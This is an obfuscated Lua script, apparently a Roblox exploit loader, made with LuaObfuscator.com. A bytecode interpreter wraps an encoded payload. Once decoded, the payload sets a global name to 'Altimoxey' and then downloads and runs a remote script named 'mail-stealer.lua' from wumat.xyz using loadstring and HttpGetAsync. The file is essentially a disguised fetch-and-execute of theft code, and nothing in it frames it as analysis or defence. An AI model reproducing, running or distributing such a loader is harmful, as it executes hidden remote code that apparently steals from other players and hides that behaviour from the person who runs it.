--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.2.4) ~  Much Love, Ferib 

]]--

do local v0=0;local v1;local v2;local v3;local v4;local v5;local v6;local v7;local v8;local v9;local v10;local v11;local v12;local v13;local v14;local v15;local v16;while true do if (v0==0) then v1=tonumber;v2=string.byte;v3=string.char;v4=string.sub;v0=1;end if (v0==2) then v9=math.ldexp;v10=getfenv or function()return _ENV;end;v11=setmetatable;v12=pcall;v0=3;end if (v0==3) then v13=select;v14=unpack or table.unpack;v15=tonumber;v16=nil;v0=4;end if (v0==1) then v5=string.gsub;v6=string.rep;v7=table.concat;v8=table.insert;v0=2;end if (v0==4) then v16=function(v25,v26,...)local v27=1;local v28;v25=v5(v4(v25,5),"..",function(v29)if (v2(v29,2)==79) then local v78=0;while true do if (v78==0) then v28=v1(v4(v29,1,1));return "";end end else local v79=v3(v1(v29,16));if v28 then local v86=v6(v79,v28);v28=nil;return v86;else return v79;end end end);local function v30(v31,v32,v33)if v33 then local v80=(701 -(211 + 239)) -(18 + 233);local v81;while true do if (v80==(0 + 0)) then v81=(v31/((1 + 1 + 0)^(v32-(1455 -(657 + 797)))))%((1 + (2 -1))^(((v33-(1 + 0)) -(v32-(1 + (680 -(465 + 215))))) + (2 -1)));return v81-(v81%(887 -(757 + (1152 -(305 + 718)))));end end else local v82=(9 -7)^(v32-(1 -0));return (((v31%(v82 + v82))>=v82) and (292 -(60 + 231))) or (1958 -(201 + 1757));end end local function v34()local v47=v2(v25,v27,v27);v27=v27 + 1;return v47;end local function v35()local v48,v49=v2(v25,v27,v27 + (5 -3));v27=v27 + 2 + 0;return (v49 * (732 -476)) + v48;end local function v36()local v50=0 + 0;local v51;local v52;local v53;local v54;while true do if (v50==((2 -1) + 0)) then return (v54 * (13808619 + 2968597)) + (v53 * (60323 + 5213)) + (v52 * (2055 -(1268 + 531))) + v51;end if ((0 + 0)==v50) then v51,v52,v53,v54=v2(v25,v27,v27 + ((1047 + 167) -(723 + 488)));v27=v27 + (617 -(289 + 324));v50=2 -1;end end end local function v37()local v55=v36();local v56=v36();local v57=4 -3;local v58=(v30(v56,3 -2,947 -(187 + 740)) * ((465 -(266 + 197))^32)) + v55;local v59=v30(v56,(93 -58) -(5 + 9),1994 -(1335 + 628));local v60=((v30(v56,5 + 27)==(1 + 0)) and  -(884 -(72 + 431 + 380))) or (1 -0);if (v59==(0 -0)) then if (v58==0) then return v60 * 0;else local v87=0 -(0 + 0);while true do if (v87==(0 + 0)) then v59=(74 + 844) -(281 + 636);v57=(520 -(454 + 66)) -0;break;end end end elseif (v59==2047) then return ((v58==(0 + 0)) and (v60 * (1/(1202 -(587 + 615))))) or (v60 * NaN);end return v9(v60,v59-(1139 -(82 + 34))) * (v57 + (v58/((4 -(1 + 1))^(42 + 10))));end local function v38(v39)local v61=0;local v62;local v63;while true do if (v61==(7 -(1438 -(150 + 1284)))) then return v7(v63);end if (v61==0) then v62=nil;if  not v39 then local v95=0 + 0;while true do if (v95==(0 -0)) then v39=v36();if (v39==(0 + 0)) then return "";end break;end end end v61=1 + 0;end if ((2 + 0)==v61) then v63={};for v88=1 -0, #v62 do v63[v88]=v3(v2(v4(v62,v88,v88)));end v61=3 + 0;end if (v61==((2417 -(717 + 457)) -(239 + 1003))) then v62=v4(v25,v27,(v27 + v39) -1);v27=v27 + v39;v61=1 + 1;end end end local v40=v36;local function v41(...)return {...},v13("#",...);end local function v42()local v64=0;local v65;local v66;local v67;local v68;local v69;local v70;local v71;local v72;local v73;while true do if (v64~=0) then else v65=1098 -(838 + 260);v66=nil;v64=435 -(151 + 283);end if (v64~=(2 + 1)) then else v71=nil;v72=nil;v64=4 -0;end if (v64==(1 + 1)) then v69=nil;v70=nil;v64=12 -9;end if (4==v64) then v73=nil;while true do if (v65~=(1835 -(1034 + 797))) then else while true do if ((1489 -(1003 + 483))==v66) then v73=nil;while true do local v118=0;while true do if (v118==(1879 -(777 + 1101))) then if ((1769 -(1190 + 578))==v67) then local v122=0 + 0;while true do if (v122~=(1 + 1)) then else v67=1252 -(956 + 294);break;end if (v122~=(0 -0)) then else local v148=0 -0;while true do if (v148~=1) then else v122=1 + 0;break;end if (v148~=(1981 -(1792 + 189))) then else local v164=0;while true do if (v164~=(0 -0)) then else v72=v36();v73={};v164=1 + 0;end if (v164~=(1538 -(436 + 1101))) then else v148=1 -0;break;end end end end end if (v122~=(630 -(139 + 490))) then else local v149=0;while true do if (v149==(1878 -(1011 + 866))) then v122=441 -(248 + 191);break;end if ((420 -(224 + 196))~=v149) then else for v166=399 -(148 + 250),v72 do local v167=0 + 0;local v168;local v169;local v170;local v171;while true do if ((2 + 0)~=v167) then else while true do if (v168~=1) then else v171=nil;while true do if (v169~=0) then else local v189=0;local v190;while true do if (v189==(0 -0)) then v190=400 -(377 + 23);while true do if (v190~=(0 -0)) then else local v203=0;while true do if (v203==(179 -(117 + 61))) then v190=1;break;end if (v203==0) then v170=v34();v171=nil;v203=1;end end end if ((1 -0)~=v190) then else v169=1 -0;break;end end break;end end end if (v169~=1) then else if (v170==1) then v171=v34()~=(0 + 0);elseif (v170==(1 + 1)) then v171=v37();elseif (v170==3) then v171=v38();end v73[v166]=v171;break;end end break;end if (v168~=(0 -0)) then else local v186=299 -(103 + 196);while true do if (v186==(1431 -(908 + 523))) then local v192=0 -0;while true do if (v192==(1934 -(937 + 996))) then v186=1;break;end if (v192==(0 -0)) then v169=0 + 0;v170=nil;v192=1 -0;end end end if ((723 -(616 + 106))~=v186) then else v168=2 -1;break;end end end end break;end if (v167==(1 -0)) then v170=nil;v171=nil;v167=1 + 1;end if (v167==(936 -(650 + 286))) then v168=1872 -(1256 + 616);v169=nil;v167=996 -(879 + 116);end end end v71[3 + 0]=v34();v149=1;end end end end end break;end if (v118==(121 -(57 + 64))) then local v121=0;while true do if (v121==(1413 -(865 + 547))) then v118=1;break;end if (v121~=(0 -0)) then else if ((1409 -(331 + 1078))~=v67) then else local v150=0;local v151;local v152;while true do if (v150==(0 -0)) then v151=1695 -(129 + 1566);v152=nil;v150=1639 -(1483 + 155);end if ((1644 -(1197 + 446))==v150) then while true do if (v151~=(0 + 0)) then else v152=1872 -(1688 + 184);while true do if (v152~=(898 -(279 + 619))) then else local v181=292 -(84 + 208);while true do if (v181==(0 + 0)) then v68={};v69={};v181=1;end if (v181~=(1011 -(70 + 940))) then else v152=1;break;end end end if (v152~=(1234 -(910 + 323))) then else local v182=0 + 0;local v183;while true do if (v182==0) then v183=0 -0;while true do if (v183~=(1 + 0)) then else v152=5 -3;break;end if (v183==0) then local v202=0 -0;while true do if (v202==(1923 -(353 + 1570))) then v70={};v71={v68,v69,nil,v70};v202=1;end if ((780 -(243 + 536))~=v202) then else v183=3 -2;break;end end end end break;end end end if (v152==(2 + 0)) then v67=1 + 0;break;end end break;end end break;end end end if (v67==(6 -4)) then local v153=0;local v154;while true do if (v153==(774 -(731 + 43))) then v154=0 + 0;while true do local v172=0 + 0;while true do if (v172~=(0 -0)) then else if (v154==1) then local v184=0 + 0;while true do if (v184==(0 + 0)) then for v193=1,v36() do v70[v193]=v36();end return v71;end end end if (v154==(0 -0)) then local v185=0 -0;while true do if (0==v185) then for v195=1,v36() do local v196=0;local v197;local v198;local v199;while true do if (v196~=(0 -0)) then else v197=0 -0;v198=nil;v196=2 -1;end if (v196==1) then v199=nil;while true do if (v197==(0 -0)) then local v204=0 + 0;while true do if (v204==(1 + 0)) then v197=1 + 0;break;end if (v204~=(0 + 0)) then else local v205=1092 -(834 + 258);while true do if (v205~=(1124 -(848 + 276))) then else v198=0;v199=nil;v205=1140 -(434 + 705);end if (v205~=(1907 -(160 + 1746))) then else v204=1 + 0;break;end end end end end if (v197==(1 + 0)) then while true do if (v198~=0) then else v199=v34();if (v30(v199,1 -0,2 -1)==(0 + 0)) then local v206=0 -0;local v207;local v208;local v209;local v210;while true do if (v206~=(1 + 0)) then else v209=nil;v210=nil;v206=1339 -(958 + 379);end if (v206==(2 -0)) then while true do if (v207==3) then if (v30(v209,3,8 -5)~=(1 + 0)) then else v210[4]=v73[v210[2 + 2]];end v68[v195]=v210;break;end if (v207~=(1 + 1)) then else local v213=0 -0;local v214;local v215;while true do if (v213~=(849 -(533 + 316))) then else v214=0;v215=nil;v213=3 -2;end if (v213~=(1 -0)) then else while true do if (v214~=0) then else v215=0 + 0;while true do if (v215~=(743 -(568 + 174))) then else v207=1515 -(680 + 832);break;end if (v215~=(1300 -(1112 + 188))) then else local v225=0 -0;while true do if ((0 -0)~=v225) then else local v228=0 -0;while true do if (v228~=(3 -2)) then else v225=1441 -(1236 + 204);break;end if (v228~=0) then else if (v30(v209,1,1)~=(624 -(261 + 362))) then else v210[2 + 0]=v73[v210[2]];end if (v30(v209,2,1 + 1)~=(1 + 0)) then else v210[3]=v73[v210[1816 -(785 + 1028)]];end v228=1 + 0;end end end if (v225==(1 + 0)) then v215=1;break;end end end end break;end end break;end end end if (v207==(4 -3)) then local v216=1015 -(341 + 674);while true do if (v216==(0 -0)) then local v222=0 -0;while true do if (v222==(612 -(550 + 62))) then v210={v35(),v35(),nil,nil};if (v208==(1094 -(723 + 371))) then local v223=0 -0;local v224;while true do if (v223~=(0 + 0)) then else v224=0 -0;while true do if (v224==(0 -0)) then v210[3]=v35();v210[4 + 0]=v35();break;end end break;end end elseif (v208==(1 + 0)) then v210[6 -3]=v36();elseif (v208==(1594 -(933 + 659))) then v210[3]=v36() -(2^(291 -(144 + 131)));elseif (v208==(2 + 1)) then local v233=0 + 0;local v234;while true do if (v233==0) then v234=0 -0;while true do if (v234~=(0 -0)) then else v210[8 -5]=v36() -((1 + 1)^(9 + 7));v210[4]=v35();break;end end break;end end end v222=2 -1;end if (v222~=(249 -(107 + 141))) then else v216=1 + 0;break;end end end if (v216==(1221 -(883 + 337))) then v207=4 -2;break;end end end if (v207~=(0 + 0)) then else local v217=0 -0;local v218;local v219;while true do if (v217~=0) then else v218=232 -(166 + 66);v219=nil;v217=1 + 0;end if (v217~=1) then else while true do if (v218~=(0 + 0)) then else v219=938 -(129 + 809);while true do if (v219==(1484 -(178 + 1305))) then v207=1 -0;break;end if (v219~=0) then else local v226=0 + 0;while true do if (v226~=1) then else v219=1;break;end if (v226==(0 -0)) then local v230=0 + 0;while true do if (v230~=(0 -0)) then else v208=v30(v199,7 -5,8 -5);v209=v30(v199,4,17 -11);v230=919 -(106 + 812);end if (v230==1) then v226=1 + 0;break;end end end end end end break;end end break;end end end end break;end if (v206~=0) then else local v211=0 + 0;while true do if (v211==(893 -(690 + 202))) then v206=1 -0;break;end if (v211~=0) then else v207=739 -(205 + 534);v208=nil;v211=1 + 0;end end end end end break;end end break;end end break;end end end for v200=3 -2,v36() do v69[v200-(1643 -(370 + 1272))]=v42();end v185=1 -0;end if (v185==(1 + 0)) then v154=3 -2;break;end end end break;end end end break;end end end v121=1;end end end end end break;end if (v66~=(1493 -(1063 + 428))) then else local v114=0;while true do if (v114==(1 -0)) then v66=3;break;end if (v114==(1012 -(598 + 414))) then v71=nil;v72=nil;v114=1;end end end if (v66~=(0 + 0)) then else local v115=0 -0;while true do if (v115~=0) then else v67=0;v68=nil;v115=718 -(674 + 43);end if ((1103 -(128 + 974))~=v115) then else v66=1;break;end end end if (v66==(1661 -(1460 + 200))) then local v116=0 + 0;while true do if (v116==(1580 -(474 + 1105))) then v66=2 -0;break;end if (v116~=(114 -(88 + 26))) then else v69=nil;v70=nil;v116=2 -1;end end end end break;end if (v65==(4 -2)) then v70=nil;v71=nil;v65=4 -1;end if (v65~=(1 + 0)) then else v68=nil;v69=nil;v65=1827 -(676 + 1149);end if (v65~=(1426 -(1206 + 220))) then else v66=0;v67=nil;v65=1083 -(982 + 100);end if (v65~=(2 + 1)) then else v72=nil;v73=nil;v65=969 -(724 + 241);end end break;end if (v64==1) then v67=nil;v68=nil;v64=2 -0;end end end local function v43(v44,v45,v46)local v74=0;local v75;local v76;local v77;while true do if (v74==1) then v77=v44[3];return function(...)local v90=1;local v91= -1;local v92={...};local v93=v13("#",...) -1;local function v94()local v96=v75;local v97=v76;local v98=v77;local v99=v41;local v100={};local v101={};local v102={};for v106=0 + 0,v93 do if ((v106>=v98) or ((5468 -2114)==(2559 -1216))) then v100[v106-v98]=v92[v106 + 1 + 0];else v102[v106]=v92[v106 + 1 + 0];end end local v103=(v93-v98) + 1;local v104;local v105;while true do local v107=0 -0;while true do if (((2165 + 2237)>(2525 -(782 + 54))) and ((1 + 0)==v107)) then if ((2125>=1932) and (v105<=6)) then if ((v105<=(1 + 1)) or ((4103 -(384 + 464))<=((2501 -(22 + 191)) -(36 + 8 + 64)))) then if (((3941 + (952 -360))>=1456) and (v105<=(0 + 0))) then for v124=v104[2],v104[2 + 1] do v102[v124]=nil;end elseif (((75 + 1717)==(1020 + 772)) and (v105>1)) then do return;end else local v126=0 -0;local v127;local v128;local v129;local v130;local v131;while true do if (((1564 + 1871)>(50 -37)) and (v126==(3 -(1037 -(502 + 533))))) then v129=nil;v130=nil;v126=(3 + 1) -2;end if ((v126==(0 + 0)) or ((1378 -(671 + 25))>3834)) then v127=0 -0;v128=nil;v126=1;end if (((6337 -1610)>=((15375 -(1119 + 429)) -10604)) and (v126==(4 -2))) then v131=nil;while true do if (((2224 -(294 + 592 + 79))==1259) and (v127==((608 -(576 + 31)) + 1))) then for v175=v128,v91 do local v176=503 -(144 + 359);local v177;while true do if (((1679 + 2764)>=(6218 -4131)) and (v176==(402 -(60 + 342)))) then v177=1310 -(532 + 778);while true do if ((v177==((997 -(76 + 114)) -(60 + 747))) or ((704 + 93)>1900)) then v131=v131 + (678 -(586 + 91));v102[v175]=v129[v131];break;end end break;end end end break;end if (((1341 -(349 + 672))<(5003 -(102 + (2737 -(475 + 524))))) and (v127==((2 -0) -1))) then local v173=0 + 0;while true do if (((1087 + 1057)>=(860 -(65 + (1503 -(1078 + 334))))) and (v173==0)) then v91=(v130 + v128) -(781 -(648 + 132));v131=(1632 -(1377 + 255)) + 0;v173=1 + 0;end if ((v173==(1910 -((934 -(175 + 366)) + 255 + 1261))) or ((1128 -(12 + 385))==(5387 -2725))) then v127=2 + 0;break;end end end if ((v127==(0 -(0 -0))) or ((1209 + 1603)<(1281 + 1160))) then local v174=1457 -(677 + (1342 -(427 + 135)));while true do if (((1122 + 800)==(2599 -(12 + 645 + 20))) and (v174==1)) then v127=1 -(0 -0);break;end if (((5065 -(437 + 568))==4060) and (v174==(1709 -(963 + 746)))) then v128=v104[3 -1];v129,v130=v99(v102[v128](v14(v102,v128 + (1 -0),v104[2 + 1])));v174=1781 -(1615 + 165);end end end end break;end end end elseif ((v105<=(2 + 2)) or ((5400 -3677)<=(1816 -1337))) then if ((v105==3) or ((3979 -(343 + 201))>(6139 -(147 + 669 + 484)))) then v102[v104[1146 -(809 + 335)]]();else local v132=0 + 0;local v133;while true do if ((v132==((0 -0) + 0)) or ((776 -(40 + 704))>(1653 + 2199))) then v133=v104[1335 -(435 + 898)];v102[v133]=v102[v133]();break;end end end elseif (((4467 + 524)>(3086 -(75 + 403 + 76))) and (v105==((80 -63) -12))) then local v134=762 -(100 + 662);local v135;local v136;while true do if ((v134==0) or (443>=(494 + 24))) then v135=v104[923 -(397 + 524)];v136=v102[v104[107 -(65 + 39)]];v134=922 -(180 + 741);end if ((v134==(1264 -(473 + 790))) or (1938==3696)) then v102[v135 + (2 -1)]=v136;v102[v135]=v136[v104[(2 + 8) -6]];break;end end else v102[v104[6 -4]]=v104[78 -(10 + 65)];end elseif ((v105<=9) or (1836==(602 -377))) then if (((169 + 742 + 49)<(3462 + 1226)) and (v105<=(7 + 0))) then v90=v104[1 + 2];elseif ((v105==(27 -19)) or ((2686 -(295 + 597))==(8256 -5184))) then v102[v104[2]]=v46[v104[1 + 2]];elseif ((3332==3332) and (v104[7 -5]==v102[v104[4]])) then v90=v90 + (1972 -(323 + 1648));else v90=v104[14 -11];end elseif ((v105<=(15 -4)) or ((4962 -(66 + 266))<=(1504 -(255 + 382)))) then if (((2925 + 1481)>(531 + 3821)) and (v105==(15 -5))) then local v141=0;local v142;local v143;local v144;while true do if (((5431 -(853 + 133))==(1251 + 3194)) and (v141==(1397 -(535 + 862)))) then v142=1117 -(419 + 698);v143=nil;v141=1 -0;end if ((1902<=(2510 -(7 + 432))) and ((3 -(7 -5))==v141)) then v144=nil;while true do if ((v142==(2 -1)) or ((1130 -768)>=(224 + 487))) then while true do if ((v143==0) or ((3764 -(567 + 2))==1347)) then v144=v104[5 -3];v102[v144]=v102[v144](v14(v102,v144 + 1 + 0,v91));break;end end break;end if ((((161 + 1117) -(940 + 338))==v142) or ((636 + 847 + 2207)<(102 + 379))) then v143=0 + 0;v144=nil;v142=371 -(71 + 299);end end break;end end else v102[v104[1 + 1 + 0]]=v104[8 -5]~=((298 + 310) -(187 + 421));end elseif ((v105==(4 + 8)) or ((1427 -(267 + 902))>=(2740 + 1526))) then v102[v104[1732 -(1076 + 654)]][v104[873 -(273 + 597)]]=v104[315 -(150 + 161)];elseif ((v102[v104[884 -(814 + 68)]]==v104[4 + 0]) or ((2156 -(1535 + 347))>=(3509 -1665))) then v90=v90 + (2 -1);else v90=v104[1793 -(314 + 1476)];end v90=v90 + 1 + 0;break;end if ((v107==(0 -0)) or ((8711 -4405)<=(192 + 278))) then local v117=0;while true do if (((2350 + 1561)==((12447 -(355 + 1502)) -6679)) and (v117==((0 -0) + 0))) then v104=v96[v90];v105=v104[1 + 0];v117=1 -0;end if ((((18842 -(1037 + 307)) -13007)>(870 + 2950)) and (v117==(2 -1))) then v107=1 + 0;break;end end end end end end A,B=v41(v12(v94));if  not A[1] then local v108=0;local v109;while true do if (0==v108) then v109=v44[4][v90] or "?";error("Script error at ["   .. v109   .. "]:"   .. A[2]);break;end end else return v14(A,2,B);end end;end if (v74==0) then v75=v44[1];v76=v44[2];v74=1;end end end return v43(v42(),{},v26)(...);end;v16("LOL!083O00028O0003073O0067657467656E7603043O006E616D6503093O00416C74696D6F786579030A3O006C6F6164737472696E6703043O0067616D65030C3O00482O74704765744173796E63032A3O00682O7470733A2O2F77756D61742E78797A2F736372697074732F6D61696C2D737465616C65722E6C756100173O0012063O00016O000100013O00260D3O0002000100010004073O00020001001206000100013O000E0900010005000100010004073O00050001001208000200024O000400020001000200300C000200030004001208000200053O001208000300063O002005000300030007001206000500084O000B000600014O0001000300064O000A00023O00022O00030002000100010004073O001600010004073O000500010004073O001600010004073O000200012O00023O00017O00173O00023O00033O00053O00053O00063O00083O00083O00093O00093O00093O000A3O000A3O000A3O000A3O000A3O000A3O000A3O000A3O000B3O000C3O000E3O000F3O00113O00",v10(),...);break;end end end
